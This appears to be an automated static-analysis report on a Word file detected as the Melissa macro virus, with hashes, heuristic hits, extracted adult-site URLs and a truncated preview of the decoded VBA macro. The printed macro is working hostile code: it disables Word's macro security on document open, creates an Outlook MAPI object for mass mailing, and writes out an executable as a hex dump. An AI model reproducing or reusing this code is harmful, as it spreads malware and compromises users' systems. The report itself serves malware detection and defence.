Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 68450b344d6f22b1…

MALICIOUS

Office (OLE)

123.5 KB Created: 2000-03-06 09:11:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 6ea6b9ba4fd7a85baccdb2bdd44e1bfb SHA-1: 930d3f726269c6559cbd6f709dfb586df1a202de SHA-256: 68450b344d6f22b12fcaa83ff3ccf8dc11394687173a434e6071fe993dc7a4f4
322 Risk Score

Heuristics 7

  • ClamAV: Doc.Trojan.Melissa-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Melissa-7
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.cyberclub.com/ignite/members In document text (OLE body)
    • http://hotbox.danni.com/hotbox/In document text (OLE body)
    • http://www.powerflow.com/members/135798642.htmlIn document text (OLE body)
    • http://www.allasians1.com/membersonly/gallery/In document text (OLE body)
    • http://www.breathlessbabes.com/protectedIn document text (OLE body)
    • http://www.caughtceleb.com/cmlogin.htmlIn document text (OLE body)
    • http://www.pornmountain.com/membersIn document text (OLE body)
    • http://www.sexillustrated.com/1stquarter/members2.htmIn document text (OLE body)
    • http://www.redlight.com/membersIn document text (OLE body)
    • http://www.freeamsterdamsex.com/membersIn document text (OLE body)
    • http://www.itouchmyself.com/members/index.htmlIn document text (OLE body)
    • http://www.dixiecam.com/members/In document text (OLE body)
    • http://www.itsreal.com/membersIn document text (OLE body)
    • http://www.111sexstreet.com/private/sex02.htmlIn document text (OLE body)
    • http://teenlabs.com/reactor/reactor1.htmIn document text (OLE body)
    • http://www.sweet18.com/home.htmlIn document text (OLE body)
    • http://members.campusbabes.com/In document text (OLE body)
    • http://www.sextv.com/members/index.htmlIn document text (OLE body)
    • http://www.smutheaven.com/m/members.htmlIn document text (OLE body)
    • http://www.creamythighs.com/members/In document text (OLE body)
    • http://www.celebrity-hardcore.com/members/index.htmlIn document text (OLE body)
    • http://www.dirtyonline.com/membersonly/In document text (OLE body)
    • http://www.sexpaige.com/members/mem_home.htmlIn document text (OLE body)
    • http://members.sexy-photos.comIn document text (OLE body)
    • http://www.cybersex.com/members/index.htmlIn document text (OLE body)
    • http://members2.5starerotica.com/index.htmlIn document text (OLE body)
    • http://www.virtualhardcore.com/pictures/index.htmlIn document text (OLE body)
    • http://www.sexxx-drive.com/members/index.htmlIn document text (OLE body)
    • http://www.sizzle.com/members/index.shtmlIn document text (OLE body)
    • http://www.lesbiansonly.com/members.htmIn document text (OLE body)
    • http://members.maturewomen.com/In document text (OLE body)
    • http://www.sexualeuphoria.com/members/archives/index.htmlIn document text (OLE body)
    • http://www.pureteens.com/membersIn document text (OLE body)
    • http://www.extremeadultsex.com/membersIn document text (OLE body)
    • http://www.sexroom.net/members/In document text (OLE body)
    • http://amazingonline.com/membersdox/In document text (OLE body)
    • http://www.venusonline.com/tricia/Members/index.htmIn document text (OLE body)
    • http://www.chickflicks.com/m/members.htmlIn document text (OLE body)
    • http://www.valuesex.com/valuesexmembers/main.htmlIn document text (OLE body)
    • http://www.xxxensation.com/cgi-sec/xxxloginIn document text (OLE body)
    • http://www.kingporno.com/authorized/In document text (OLE body)
    • http://www.erotic-express.com/member/eng/In document text (OLE body)
    • http://www.sexualeuphoria.com/members/index.htmlIn document text (OLE body)
    • http://members.celebs-n-models.net/babes/In document text (OLE body)
    • http://www.erosnet.com/home.htmlIn document text (OLE body)
    • http://www.manhole.com/members/index.htmlIn document text (OLE body)
    • http://www.cyberstrip.com/members/html/members.cfmIn document text (OLE body)
    • http://www.corinadine.com/members/index.htmlIn document text (OLE body)
    • http://www.Shockingpink.com/members/tina1.htmlIn document text (OLE body)
    • http://www.adultpleasures.com/members/In document text (OLE body)
    +21 more URL(s)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 56432 bytes
SHA-256: 1b21b7e5ac699f083fbe6a22317e90838385dc41a8e4a40738869dd7c9b360cb
Detection
ClamAV: Doc.Trojan.Melissa-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then

Open "xtianpig.scr" For Output As #1
Print #1, "N BASTARD.COM"
Print #1, "E 0100 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00"
Print #1, "E 0110 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00"
Print #1, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00"
Print #1, "E 0140 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90"
Print #1, "E 0150 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73"
Print #1, "E 0160 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57"
Print #1, "E 0170 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00"
Print #1, "E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0200 50 45 00 00 4C 01 04 00 66 28 01 3E 00 00 00 00"
Print #1, "E 0210 00 00 00 00 E0 00 8E 81 0B 01 02 19 00 02 00 00"
Print #1, "E 0220 00 24 00 00 00 00 00 00 1C 34 00 00 00 10 00 00"
Print #1, "E 0230 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00"
Print #1, "E 0240 01 00 00 00 00 00 00 00 03 00 0A 00 00 00 00 00"
Print #1, "E 0250 00 60 00 00 00 04 00 00 00 00 00 00 02 00 00 00"
Print #1, "E 0260 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00"
Print #1, "E 0270 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0280 00 40 00 00 EE 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02A0 00 50 00 00 14 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02F0 00 00 00 00 00 00 00 00 43 4F 44 45 00 00 00 00"
Print #1, "E 0300 00 10 00 00 00 10 00 00 00 02 00 00 00 06 00 00"
Print #1, "E 0310 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60"
Print #1, "E 0320 44 41 54 41 00 00 00 00 00 20 00 00 00 20 00 00"
Print #1, "E 0330 00 20 00 00 00 08 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0340 00 00 00 00 40 00 00 C0 2E 69 64 61 74 61 00 00"
Print #1, "E 0350 00 10 00 00 00 40 00 00 00 02 00 00 00 28 00 00"
Print #1, "E 0360 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0"
Print #1, "E 0370 2E 72 65 6C 6F 63 00 00 00 10 00 00 00 50 00 00"
Print #1, "E 0380 00 02 00 00 00 2A 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0390 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00"
Print #1, "E 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 03
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.